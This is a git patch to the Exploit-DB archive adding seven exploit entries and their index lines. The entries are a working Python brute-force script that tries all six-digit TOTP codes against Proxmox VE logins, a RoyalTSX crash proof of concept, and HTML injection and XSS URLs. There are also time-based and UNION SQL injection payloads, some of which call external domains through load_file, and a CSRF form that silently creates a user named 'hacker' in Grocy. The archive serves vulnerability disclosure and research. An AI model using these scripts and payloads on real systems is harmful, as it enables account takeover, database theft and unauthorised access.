From 2aed99237cd1a464536838044637e61761b1e46a Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Thu, 1 Feb 2024 00:16:32 +0000 Subject: [PATCH] DB: 2024-02-01 8 changes to exploits/shellcodes/ghdb Proxmox VE - TOTP Brute Force RoyalTSX 6.0.1 - RTSZ File Handling Heap Memory Corruption PoC GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities 101 News 1.0 - Multiple-SQLi Academy LMS 6.2 - Reflected XSS Academy LMS 6.2 - SQL Injection Grocy <=4.0.2 - CSRF --- exploits/linux/remote/51763.py | 81 +++++++++++++++ exploits/macos/remote/51764.txt | 149 ++++++++++++++++++++++++++++ exploits/multiple/webapps/51762.txt | 14 +++ exploits/php/webapps/51757.txt | 40 ++++++++ exploits/php/webapps/51758.txt | 46 +++++++++ exploits/php/webapps/51759.txt | 48 +++++++++ exploits/php/webapps/51760.txt | 52 ++++++++++ files_exploits.csv | 7 ++ 8 files changed, 437 insertions(+) create mode 100755 exploits/linux/remote/51763.py create mode 100644 exploits/macos/remote/51764.txt create mode 100644 exploits/multiple/webapps/51762.txt create mode 100644 exploits/php/webapps/51757.txt create mode 100644 exploits/php/webapps/51758.txt create mode 100644 exploits/php/webapps/51759.txt create mode 100644 exploits/php/webapps/51760.txt diff --git a/exploits/linux/remote/51763.py b/exploits/linux/remote/51763.py new file mode 100755 index 000000000..b3674bf73 --- /dev/null +++ b/exploits/linux/remote/51763.py @@ -0,0 +1,81 @@ +# Exploit Title: Proxmox VE TOTP Brute Force +# Date: 09/23/2023 +# Exploit Author: Cory Cline, Gabe Rust +# Vendor Homepage: https://www.proxmox.com/en/ +# Software Link: http://download.proxmox.com/iso/ +# Version: 5.4 - 7.4-1 +# Tested on: Debian +# CVE : CVE-2023-43320 + +import time +import requests +import urllib.parse +import json +import os +import urllib3 + +urllib3.disable_warnings() +threads=25 + +#################### REPLACE THESE VALUES ######################### +password="KNOWN PASSWORD HERE" +username="KNOWN USERNAME HERE" +target_url="https://HOST:PORT" +################################################################## + +ticket="" +ticket_username="" +CSRFPreventionToken="" +ticket_data={} + +auto_refresh_time = 20 # in minutes - 30 minutes before expiration +last_refresh_time = 0 + +tokens = []; + +for num in range(0,1000000): + tokens.append(str(num).zfill(6)) + +def refresh_ticket(target_url, username, password): + global CSRFPreventionToken + global ticket_username + global ticket_data + refresh_ticket_url = target_url + "/api2/extjs/access/ticket" + refresh_ticket_cookies = {} + refresh_ticket_headers = {} + refresh_ticket_data = {"username": username, "password": password, "realm": "pve", "new-format": "1"} + ticket_data_raw = urllib.parse.unquote(requests.post(refresh_ticket_url, headers=refresh_ticket_headers, cookies=refresh_ticket_cookies, data=refresh_ticket_data, verify=False).text) + ticket_data = json.loads(ticket_data_raw) + CSRFPreventionToken = ticket_data["data"]["CSRFPreventionToken"] + ticket_username = ticket_data["data"]["username"] + +def attack(token): + global last_refresh_time + global auto_refresh_time + global target_url + global username + global password + global ticket_username + global ticket_data + if ( int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)) ): + refresh_ticket(target_url, username, password) + last_refresh_time = int(time.time()) + + url = target_url + "/api2/extjs/access/ticket" + cookies = {} + headers = {"Csrfpreventiontoken": CSRFPreventionToken} + stage_1_ticket = str(json.dumps(ticket_data["data"]["ticket"]))[1:-1] + stage_2_ticket = stage_1_ticket.replace('\\"totp\\":', '\"totp\"%3A').replace('\\"recovery\\":', '\"recovery\"%3A') + data = {"username": ticket_username, "tfa-challenge": stage_2_ticket, "password": "totp:" + str(token)} + response = requests.post(url, headers=headers, cookies=cookies, data=data, verify=False) + if(len(response.text) > 350): + print(response.text) + os._exit(1) + +while(1): + refresh_ticket(target_url, username, password) + last_refresh_time = int(time.time()) + + with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor: + res = [executor.submit(attack, token) for token in tokens] + concurrent.futures.wait(res) \ No newline at end of file diff --git a/exploits/macos/remote/51764.txt b/exploits/macos/remote/51764.txt new file mode 100644 index 000000000..e7882fb82 --- /dev/null +++ b/exploits/macos/remote/51764.txt @@ -0,0 +1,149 @@ +RoyalTSX 6.0.1 RTSZ File Handling Heap Memory Corruption PoC + + +Vendor: Royal Apps GmbH +Web page: https://www.royalapps.com +Affected version: 6.0.1.1000 (macOS) + +Summary: Royal TS is an ideal tool for system engineers and +other IT professionals who need remote access to systems with +different protocols. Not only easy to use, it enables secure +multi-user document sharing. + +Desc: The application receives SIGABRT after RAPortCheck.createNWConnection() +function is handling the SecureGatewayHost object in the RoyalTSXNativeUI. +When the hostname has an array of around 1600 bytes and Test Connection is +clicked the app crashes instantly. + +Tested on: MacOS 13.5.1 (Ventura) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5788 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5788.php + + +05.09.2023 + +-- + + +------------------------------------- +Translated Report (Full Report Below) +------------------------------------- + +Process: RoyalTSX [23807] +Path: /Applications/Royal TSX.app/Contents/MacOS/RoyalTSX +Identifier: com.lemonmojo.RoyalTSX.App +Version: 6.0.1 (6.0.1.1000) +Code Type: X86-64 (Native) +Parent Process: launchd [1] +User ID: 503 + +Date/Time: 2023-09-05 16:09:46.6361 +0200 +OS Version: macOS 13.5.1 (22G90) +Report Version: 12 +Bridge OS Version: 7.6 (20P6072) + +Time Awake Since Boot: 21000 seconds +Time Since Wake: 1106 seconds + +System Integrity Protection: enabled + +Crashed Thread: 0 tid_103 Dispatch queue: com.apple.main-thread + +Exception Type: EXC_BAD_ACCESS (SIGABRT) +Exception Codes: KERN_INVALID_ADDRESS at 0x0000000000000050 +Exception Codes: 0x0000000000000001, 0x0000000000000050 + +Termination Reason: Namespace SIGNAL, Code 6 Abort trap: 6 +Terminating Process: RoyalTSX [23807] + +VM Region Info: 0x50 is not in any region. Bytes before following region: 140737488273328 + REGION TYPE START - END [ VSIZE] PRT/MAX SHRMOD REGION DETAIL + UNUSED SPACE AT START +---> + shared memory 7ffffffec000-7ffffffed000 [ 4K] r-x/r-x SM=SHM + +Application Specific Information: +abort() called + + +Thread 0 Crashed:: tid_103 Dispatch queue: com.apple.main-thread +0 libsystem_kernel.dylib 0x7ff809ef7202 __pthread_kill + 10 +1 libsystem_pthread.dylib 0x7ff809f2eee6 pthread_kill + 263 +2 libsystem_c.dylib 0x7ff809e55b45 abort + 123 +3 libmonosgen-2.0.1.dylib 0x1028daa1b altstack_handle_and_restore + 235 +4 libmonosgen-2.0.1.dylib 0x102879db6 summarize_frame_internal + 310 +5 libmonosgen-2.0.1.dylib 0x102879f66 summarize_frame + 198 +6 libmonosgen-2.0.1.dylib 0x10287578f mono_walk_stack_full + 1135 +7 libmonosgen-2.0.1.dylib 0x102873944 mono_summarize_managed_stack + 100 +8 libmonosgen-2.0.1.dylib 0x102a0f478 mono_threads_summarize_execute_internal + 1256 +9 libmonosgen-2.0.1.dylib 0x102a0f8aa mono_threads_summarize + 346 +10 libmonosgen-2.0.1.dylib 0x1028e0b67 mono_dump_native_crash_info + 855 +11 libmonosgen-2.0.1.dylib 0x10287864e mono_handle_native_crash + 318 +12 libmonosgen-2.0.1.dylib 0x1027d1966 mono_crashing_signal_handler + 86 +13 libsystem_platform.dylib 0x7ff809f5c5ed _sigtramp + 29 +14 ??? 0x101e9502c ??? +15 RoyalTSXNativeUI 0x109e50012 RAPortCheck.createNWConnection() + 290 +16 RoyalTSXNativeUI 0x109e4f6d2 RAPortCheck.connect() + 242 +17 RoyalTSXNativeUI 0x10a021c70 static RASecureGatewayPropertyPageHelper.testConnection(hostname:port:logger:localizer:parentWindow:progressIndicator:testConnectionButton:) + 592 +18 RoyalTSXNativeUI 0x10a0b94e7 RAPropertyPageSecureGatewayMain.testConnection() + 359 +19 RoyalTSXNativeUI 0x10a0b9573 @objc RAPropertyPageSecureGatewayMain.buttonTestConnection_action(_:) + 51 +20 AppKit 0x7ff80d29742c -[NSApplication(NSResponder) sendAction:to:from:] + 323 +21 AppKit 0x7ff80d2972b0 -[NSControl sendAction:to:] + 86 +22 AppKit 0x7ff80d2971e2 __26-[NSCell _sendActionFrom:]_block_invoke + 131 +23 AppKit 0x7ff80d2970eb -[NSCell _sendActionFrom:] + 171 +24 AppKit 0x7ff80d297031 -[NSButtonCell _sendActionFrom:] + 96 +25 AppKit 0x7ff80d293ee5 NSControlTrackMouse + 1816 +26 AppKit 0x7ff80d2937a9 -[NSCell trackMouse:inRect:ofView:untilMouseUp:] + 121 +27 AppKit 0x7ff80d29367c -[NSButtonCell trackMouse:inRect:ofView:untilMouseUp:] + 606 +28 AppKit 0x7ff80d292ac0 -[NSControl mouseDown:] + 659 +29 AppKit 0x7ff80d290f9d -[NSWindow(NSEventRouting) _handleMouseDownEvent:isDelayedEvent:] + 4330 +30 AppKit 0x7ff80d2087d7 -[NSWindow(NSEventRouting) _reallySendEvent:isDelayedEvent:] + 404 +31 AppKit 0x7ff80d208427 -[NSWindow(NSEventRouting) sendEvent:] + 345 +32 AppKit 0x7ff80d206e01 -[NSApplication(NSEvent) sendEvent:] + 345 +33 AppKit 0x7ff80d3413ae -[NSApplication _doModalLoop:peek:] + 360 +34 AppKit 0x7ff80d4c2219 __33-[NSApplication runModalSession:]_block_invoke_2 + 69 +35 AppKit 0x7ff80d4c21c1 __33-[NSApplication runModalSession:]_block_invoke + 78 +36 AppKit 0x7ff80d33f773 _NSTryRunModal + 100 +37 AppKit 0x7ff80d4c20be -[NSApplication runModalSession:] + 128 +38 RoyalTSXNativeUI 0x109f17044 RAPropertiesWindowController._showModal() + 628 +39 RoyalTSXNativeUI 0x109f17548 @objc RAPropertiesWindowController._showModal() + 24 +40 Foundation 0x7ff80ae84951 -[NSObject(NSThreadPerformAdditions) performSelector:onThread:withObject:waitUntilDone:modes:] + 379 +41 Foundation 0x7ff80ae84676 -[NSObject(NSThreadPerformAdditions) performSelectorOnMainThread:withObject:waitUntilDone:] + 124 +42 libffi.dylib 0x7ff81a5fd8c2 ffi_call_unix64 + 82 +43 libffi.dylib 0x7ff81a5fd214 ffi_call_int + 830 + +Thread 0 crashed with X86 Thread State (64-bit): + rax: 0x0000000000000000 rbx: 0x00007ff84d608700 rcx: 0x00007ff7be10fbc8 rdx: 0x0000000000000000 + rdi: 0x0000000000000103 rsi: 0x0000000000000006 rbp: 0x00007ff7be10fbf0 rsp: 0x00007ff7be10fbc8 + r8: 0x0000000000000212 r9: 0x00007fafaeaf64a8 r10: 0x0000000000000000 r11: 0x0000000000000246 + r12: 0x0000000000000103 r13: 0x00007ff7be110418 r14: 0x0000000000000006 r15: 0x0000000000000016 + rip: 0x00007ff809ef7202 rfl: 0x0000000000000246 cr2: 0x00007ff84d611068 + +Logical CPU: 0 +Error Code: 0x02000148 +Trap Number: 133 + +Thread 0 instruction stream: + 0f 84 24 01 00 00 49 8b-79 08 4c 89 45 c0 89 4d ..$...I.y.L.E..M + d4 48 89 55 c8 4d 89 cc-e8 5d 79 0e 00 48 89 c3 .H.U.M...]y..H.. + 4b 8d 7c 3e 04 48 8b 73-30 ba 8c 00 00 00 e8 07 K.|>.H.s0....... + 7f 25 00 4c 8b 45 c0 48-8b 43 58 4b 89 84 3e a0 .%.L.E.H.CXK..>. + 00 00 00 41 8b 44 24 04-43 89 84 3e 90 00 00 00 ...A.D$.C..>.... + 48 8b 43 38 4b 89 84 3e-a8 00 00 00 48 8b 43 60 H.C8K..>....H.C` + [8b]40 50 43 89 84 3e b0-00 00 00 8b 43 40 43 89 .@PC..>.....C@C. <== + 84 3e b4 00 00 00 48 8b-45 c8 43 89 84 3e 98 00 .>....H.E.C..>.. + 00 00 8b 45 d4 43 89 84-3e 94 00 00 00 eb 18 48 ...E.C..>......H + 8d 05 80 ff 26 00 e9 96-00 00 00 43 c7 84 3e 90 ....&......C..>. + 00 00 00 ff ff ff ff 49-8b 45 10 48 8b 18 41 83 .......I.E.H..A. + 38 00 74 24 4b 8d 7c 3e-04 4d 89 c4 e8 69 d8 14 8.t$K.|>.M...i.. + +Binary Images: + 0x101deb000 - 0x101df6fff com.lemonmojo.RoyalTSX.App (6.0.1) <328845a4-2e68-3c0f-a495-033ac725bb43> /Applications/Royal TSX.app/Contents/MacOS/RoyalTSX +... +... \ No newline at end of file diff --git a/exploits/multiple/webapps/51762.txt b/exploits/multiple/webapps/51762.txt new file mode 100644 index 000000000..077594c9c --- /dev/null +++ b/exploits/multiple/webapps/51762.txt @@ -0,0 +1,14 @@ +# Exploit Title: GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities +# Date: 25/9/2023 +# Exploit Author: Syed Affan Ahmed (ZEROXINN) +# Vendor Homepage: https://www.embedthis.com/goahead/ +# Affected Version: 2.5 may be others. +# Tested On Version: 2.5 in ZTE AC3630 + +---------------------------POC--------------------------- + +GoAhead Web Server Version 2.5 is prone to Multiple HTML-injection vulnerabilities due to inadequate input validation. + +HTML Injection can cause the ability to execute within the context of that site. + +http://192.168.0.1/goform/formTest?name=

Hello

&address=

World

\ No newline at end of file diff --git a/exploits/php/webapps/51757.txt b/exploits/php/webapps/51757.txt new file mode 100644 index 000000000..d3582a783 --- /dev/null +++ b/exploits/php/webapps/51757.txt @@ -0,0 +1,40 @@ +# Exploit Title: Academy LMS 6.2 - Reflected XSS +# Exploit Author: CraCkEr +# Date: 29/08/2023 +# Vendor: Creativeitem +# Vendor Homepage: https://creativeitem.com/ +# Software Link: https://demo.creativeitem.com/academy/ +# Tested on: Windows 10 Pro +# Impact: Manipulate the content of the site +# CVE: CVE-2023-4973 +# CWE: CWE-79 - CWE-74 - CWE-707 + + +## Greetings + +The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka +CryptoJob (Twitter) twitter.com/0x0CryptoJob + + +## Description + +The attacker can send to victim a link containing a malicious URL in an email or instant message +can perform a wide variety of actions, such as stealing the victim's session token or login credentials + + +Path: /academy/tutor/filter + +GET parameter 'searched_word' is vulnerable to XSS +GET parameter 'searched_tution_class_type[]' is vulnerable to XSS +GET parameter 'searched_price_type[]' is vulnerable to XSS +GET parameter 'searched_duration[]' is vulnerable to XSS + +https://website/academy/tutor/filter?searched_word=[XSS]&searched_tution_class_type%5B%5D=[XSS]&price_min=1&price_max=9&searched_price_type%5B%5D=[XSS]&searched_duration%5B%5D=[XSS] + + +XSS Payload: + +acoa5">dyzs0 + + +[-] Done \ No newline at end of file diff --git a/exploits/php/webapps/51758.txt b/exploits/php/webapps/51758.txt new file mode 100644 index 000000000..9702c15b7 --- /dev/null +++ b/exploits/php/webapps/51758.txt @@ -0,0 +1,46 @@ +# Exploit Title: Academy LMS 6.2 - SQL Injection +# Exploit Author: CraCkEr +# Date: 29/08/2023 +# Vendor: Creativeitem +# Vendor Homepage: https://creativeitem.com/ +# Software Link: https://demo.creativeitem.com/academy/ +# Tested on: Windows 10 Pro +# Impact: Database Access +# CVE: CVE-2023-4974 +# CWE: CWE-89 / CWE-74 / CWE-707 + + +## Greetings + +The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka +CryptoJob (Twitter) twitter.com/0x0CryptoJob + + +## Description + +SQL injection attacks can allow unauthorized access to sensitive data, modification of +data and crash the application or make it unavailable, leading to lost revenue and +damage to a company's reputation. + + +Path: /academy/tutor/filter + +GET parameter 'price_min' is vulnerable to SQL Injection +GET parameter 'price_max' is vulnerable to SQL Injection + +https://website/academy/tutor/filter?searched_word=&searched_tution_class_type%5B%5D=1&price_min=[SQLi]&price_max=[SQLi]&searched_price_type%5B%5D=hourly&searched_duration%5B%5D=0 + +--- +Parameter: price_min (GET) + Type: time-based blind + Title: MySQL >= 5.0.12 time-based blind (query SLEEP) + Payload: searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 + +Parameter: price_max (GET) + Type: time-based blind + Title: MySQL >= 5.0.12 time-based blind (query SLEEP) + Payload: searched_word=&searched_tution_class_type[]=1&price_min=1&price_max=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&searched_price_type[]=hourly&searched_duration[]=0 +--- + + +[-] Done \ No newline at end of file diff --git a/exploits/php/webapps/51759.txt b/exploits/php/webapps/51759.txt new file mode 100644 index 000000000..be8c6e598 --- /dev/null +++ b/exploits/php/webapps/51759.txt @@ -0,0 +1,48 @@ +## Title: 101 News-1.0 Multiple-SQLi +## Author: nu11secur1ty +## Date: 09/16/2023 +## Vendor: https://mayurik.com/ +## Software: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html +## Reference: https://portswigger.net/web-security/sql-injection + +## Description: +The searchtitle parameter appears to be vulnerable to SQL injection +attacks. The payload '+(select +load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.oastify.com\\utu'))+' +was submitted in the searchtitle parameter. This payload injects a SQL +sub-query that calls MySQL's load_file function with a UNC file path +that references a URL on an external domain. The application +interacted with that domain, indicating that the injected SQL query +was executed. + + +[+]Payload: +```mysql +--- +Parameter: searchtitle (POST) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause + Payload: searchtitle=-7320%' OR 3167=3167 AND 'urvA%'='urvA + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: searchtitle=814271'+(select +load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%' +AND (SELECT 8775 FROM (SELECT(SLEEP(15)))yMEL) AND 'gPWH%'='gPWH + + Type: UNION query + Title: MySQL UNION query (NULL) - 3 columns + Payload: searchtitle=814271'+(select +load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%' +UNION ALL SELECT +NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6a71,0x4b6d704e6546715a6662496571705179434d6d5a71586b567a4278464c564d61766174626f787063,0x7170767071),NULL,NULL# + +## Reproduce: +https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/101%20News-1.0 + +## Proof and Exploit: +https://www.nu11secur1ty.com/2023/09/101-news-10-multiple-sqli.html + +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51760.txt b/exploits/php/webapps/51760.txt new file mode 100644 index 000000000..f87c89322 --- /dev/null +++ b/exploits/php/webapps/51760.txt @@ -0,0 +1,52 @@ +# Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability +# Application: Grocy +# Version: <= 4.0.2 +# Date: 09/21/2023 +# Exploit Author: Chance Proctor +# Vendor Homepage: https://grocy.info/ +# Software Link: https://github.com/grocy/grocy +# Tested on: Linux +# CVE : CVE-2023-42270 + + + +Overview +================================================== +When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting. +This makes it easy to adjust your request since it is a known format. +There is also no CSRF Token or other methods of verification in place to verify where the request is coming from. +This allows for html code to generate a new user as long as the target is logged in and has Create User Permissions. + + + +Proof of Concept +================================================== +Host the following html code via a XSS or delivery via a phishing campaign: + + +
+ + + +
+ + + + +If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials + + Username: hacker + Password: test + +Note: +In order for this to work, the target must have Create User Permissions. +This is enabled by default. + + + +Proof of Exploit/Reproduce +================================================== +http://xploit.sh/posts/cve-2023-42270/ \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ac6dce0d0..5fa49729d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -8568,6 +8568,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 4312,exploits/linux/remote/4312.c,"ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow",2007-08-24,netris,remote,linux,21,2007-08-23,2017-08-29,1,,,,,http://www.exploit-db.comproftpd-1.3.0a.tar.gz, 15449,exploits/linux/remote/15449.pl,"ProFTPd IAC 1.3.x - Remote Command Execution",2010-11-07,kingcope,remote,linux,,2010-11-07,2016-12-04,1,CVE-2010-4221,,,http://www.exploit-db.com/screenshots/idlt15500/screen-shot-2010-11-07-at-10044-pm.png,http://www.exploit-db.comproftpd-basic_1.3.3a-4_i386.deb, 16921,exploits/linux/remote/16921.rb,"ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)",2010-12-03,Metasploit,remote,linux,,2010-12-03,2011-03-06,1,OSVDB-69562,"Metasploit Framework (MSF)",,,, +51763,exploits/linux/remote/51763.py,"Proxmox VE - TOTP Brute Force",2024-01-31,"Cory Cline_ Gabe Rust",remote,linux,,2024-01-31,2024-01-31,0,,,,,, 39499,exploits/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Command Execution",2016-02-26,Sysdream,remote,linux,,2016-02-26,2016-12-04,0,,,,,, 652,exploits/linux/remote/652.c,"Prozilla 1.3.6 - Remote Stack Overflow",2004-11-23,"Serkan Akpolat",remote,linux,8080,2004-11-22,2016-04-19,1,OSVDB-12111;CVE-2004-1120,,,,http://www.exploit-db.comprozilla-1.3.6.tar.gz, 806,exploits/linux/remote/806.c,"Prozilla 1.3.7.3 - Remote Format String",2005-02-09,"Serkan Akpolat",remote,linux,8080,2005-02-08,2016-04-28,1,OSVDB-14181;CVE-2005-0523,,,,http://www.exploit-db.comprozilla_1.3.6.orig.tar.gz, @@ -9196,6 +9197,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41443,exploits/macos/remote/41443.html,"Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read",2017-02-23,"Google Security Research",remote,macos,,2017-02-23,2017-04-05,1,CVE-2017-2361;HT207483,Remote,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1040 41964,exploits/macos/remote/41964.html,"Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free",2017-05-04,"saelo & niklasb",remote,macos,,2017-05-04,2017-05-05,1,CVE-2017-2491,,,,,https://phoenhex.re/2017-05-04/pwn2own17-cachedcall-uaf 42125,exploits/macos/remote/42125.txt,"Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution",2017-06-06,saelo,remote,macos,,2017-06-06,2017-06-06,0,CVE-2017-2536,,,,,https://phoenhex.re/2017-06-02/arrayspread +51764,exploits/macos/remote/51764.txt,"RoyalTSX 6.0.1 - RTSZ File Handling Heap Memory Corruption PoC",2024-01-31,LiquidWorm,remote,macos,,2024-01-31,2024-01-31,0,,,,,, 45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos,,2018-12-14,2018-12-14,1,CVE-2018-4404;CVE-2018-4233,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/cc7cb7302ef43478292f684f473fadb00f9b4344/modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb 46932,exploits/macos/remote/46932.txt,"Typora 0.9.9.24.6 - Directory Traversal",2019-05-27,"Dhiraj Mishra",remote,macos,,2019-05-27,2019-06-19,0,CVE-2019-12137,,,http://www.exploit-db.com/screenshots/idlt47000/typora.png,, 41449,exploits/macos/webapps/41449.html,"Apple WebKit 10.0.2 - 'FrameLoader::clear' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",webapps,macos,,2017-02-24,2017-02-24,1,CVE-2017-2363;HT207487;HT207485;HT207484;HT207482,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1049 @@ -11829,6 +11831,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44996,exploits/multiple/webapps/44996.py,"Gitea 1.4.0 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,multiple,,2018-07-10,2018-07-10,0,,,,,,https://security.szurek.pl/gitea-1-4-0-unauthenticated-rce.html 49383,exploits/multiple/webapps/49383.py,"Gitea 1.7.5 - Remote Code Execution",2021-01-06,1F98D,webapps,multiple,,2021-01-06,2021-04-01,1,CVE-2019-11229,,,,, 42392,exploits/multiple/webapps/42392.py,"GitHub Enterprise < 2.8.7 - Remote Code Execution",2017-03-15,orange,webapps,multiple,,2017-07-29,2017-07-29,0,,,,,,http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html +51762,exploits/multiple/webapps/51762.txt,"GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities",2024-01-31,"Syed Affan Ahmed (ZEROXINN)",webapps,multiple,,2024-01-31,2024-01-31,0,,,,,, 35237,exploits/multiple/webapps/35237.txt,"Gogs - 'label' SQL Injection",2014-11-14,"Timo Schmid",webapps,multiple,80,2014-11-14,2017-11-14,0,CVE-2014-8681;OSVDB-114644,,,,, 35238,exploits/multiple/webapps/35238.txt,"Gogs - 'users'/'repos' '?q' SQL Injection",2014-11-14,"Timo Schmid",webapps,multiple,,2014-11-14,2017-11-14,0,CVE-2014-8682;OSVDB-114646;OSVDB-114645,,,,, 48027,exploits/multiple/webapps/48027.txt,"Google Invisible RECAPTCHA 3 - Spoof Bypass",2020-02-07,Matamorphosis,webapps,multiple,,2020-02-07,2020-02-07,0,,,,,, @@ -13102,6 +13105,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42531,exploits/php/webapps/42531.txt,"(Bitcoin / Dogecoin) PHP Cloud Mining Script - Authentication Bypass",2017-08-21,"Ihsan Sencan",webapps,php,,2017-08-21,2017-08-22,0,,,,,, 4896,exploits/php/webapps/4896.pl,"0DayDB 2.3 - 'id' Remote Authentication Bypass",2008-01-11,Pr0metheuS,webapps,php,,2008-01-10,2016-10-26,1,,,,,, 26561,exploits/php/webapps/26561.txt,"1-2-3 Music Store 1.0 - 'Process.php' SQL Injection",2005-11-23,r0t,webapps,php,,2005-11-23,2013-07-03,1,CVE-2005-3855;OSVDB-21074,,,,,https://www.securityfocus.com/bid/15544/info +51759,exploits/php/webapps/51759.txt,"101 News 1.0 - Multiple-SQLi",2024-01-31,nu11secur1ty,webapps,php,,2024-01-31,2024-01-31,0,,,,,, 3832,exploits/php/webapps/3832.txt,"1024 CMS 0.7 - 'download.php' Remote File Disclosure",2007-05-02,Dj7xpl,webapps,php,,2007-05-01,2016-11-21,1,OSVDB-35542;CVE-2007-2507,,,,, 18000,exploits/php/webapps/18000.txt,"1024 CMS 1.1.0 Beta - 'force_download.php' Local File Inclusion",2011-10-19,"Sangyun YOO",webapps,php,,2011-10-19,2011-10-19,0,OSVDB-83431,,,,, 35598,exploits/php/webapps/35598.txt,"1024 CMS 1.1.0 Beta - Multiple Input Validation Vulnerabilities",2011-04-08,"QSecure & Demetris Papapetrou",webapps,php,,2011-04-08,2014-12-23,1,,,,,,https://www.securityfocus.com/bid/47282/info @@ -13330,6 +13334,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 45600,exploits/php/webapps/45600.txt,"Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)",2018-10-15,"Ihsan Sencan",webapps,php,80,2018-10-15,2018-10-18,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comAcademic_Timetable_Final_Build_v70.zip, 51654,exploits/php/webapps/51654.txt,"Academy LMS 6.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4119,,,,, 51702,exploits/php/webapps/51702.txt,"Academy LMS 6.1 - Arbitrary File Upload",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,,,,,, +51757,exploits/php/webapps/51757.txt,"Academy LMS 6.2 - Reflected XSS",2024-01-31,CraCkEr,webapps,php,,2024-01-31,2024-01-31,0,,,,,, +51758,exploits/php/webapps/51758.txt,"Academy LMS 6.2 - SQL Injection",2024-01-31,CraCkEr,webapps,php,,2024-01-31,2024-01-31,0,,,,,, 36110,exploits/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,webapps,php,,2011-09-02,2015-04-18,1,,,,,http://www.exploit-db.comACal-2.2.6.zip,https://www.securityfocus.com/bid/49442/info 1763,exploits/php/webapps/1763.txt,"ACal 2.2.6 - 'day.php' Remote File Inclusion",2006-05-07,PiNGuX,webapps,php,,2006-05-06,2015-04-18,1,OSVDB-25340;CVE-2006-2261,,,,http://www.exploit-db.comACal-2.2.6.zip, 38697,exploits/php/webapps/38697.txt,"ACal 2.2.6 - 'view' Local File Inclusion",2013-08-15,ICheer_No0M,webapps,php,,2013-08-15,2015-11-15,1,OSVDB-96304,,,,,https://www.securityfocus.com/bid/61801/info @@ -19315,6 +19321,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 11107,exploits/php/webapps/11107.txt,"gridcc script 1.0 - SQL Injection / Cross-Site Scripting",2010-01-11,Red-D3v1L,webapps,php,,2010-01-10,,1,,,,,, 45795,exploits/php/webapps/45795.txt,"Grocery crud 1.6.1 - 'search_field' SQL Injection",2018-11-06,"Loading Kura Kura",webapps,php,80,2018-11-06,2018-11-07,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comgrocery-crud-1.6.1.zip, 48792,exploits/php/webapps/48792.txt,"grocy 2.7.1 - Persistent Cross-Site Scripting",2020-09-07,"Mufaddal Masalawala",webapps,php,,2020-09-07,2020-09-07,0,,,,,, +51760,exploits/php/webapps/51760.txt,"Grocy <=4.0.2 - CSRF",2024-01-31,"Chance Proctor",webapps,php,,2024-01-31,2024-01-31,0,,,,,, 51526,exploits/php/webapps/51526.txt,"Groomify v1.0 - SQL Injection",2023-06-19,"Ahmet Ümit BAYRAM",webapps,php,,2023-06-19,2023-06-19,0,,,,,, 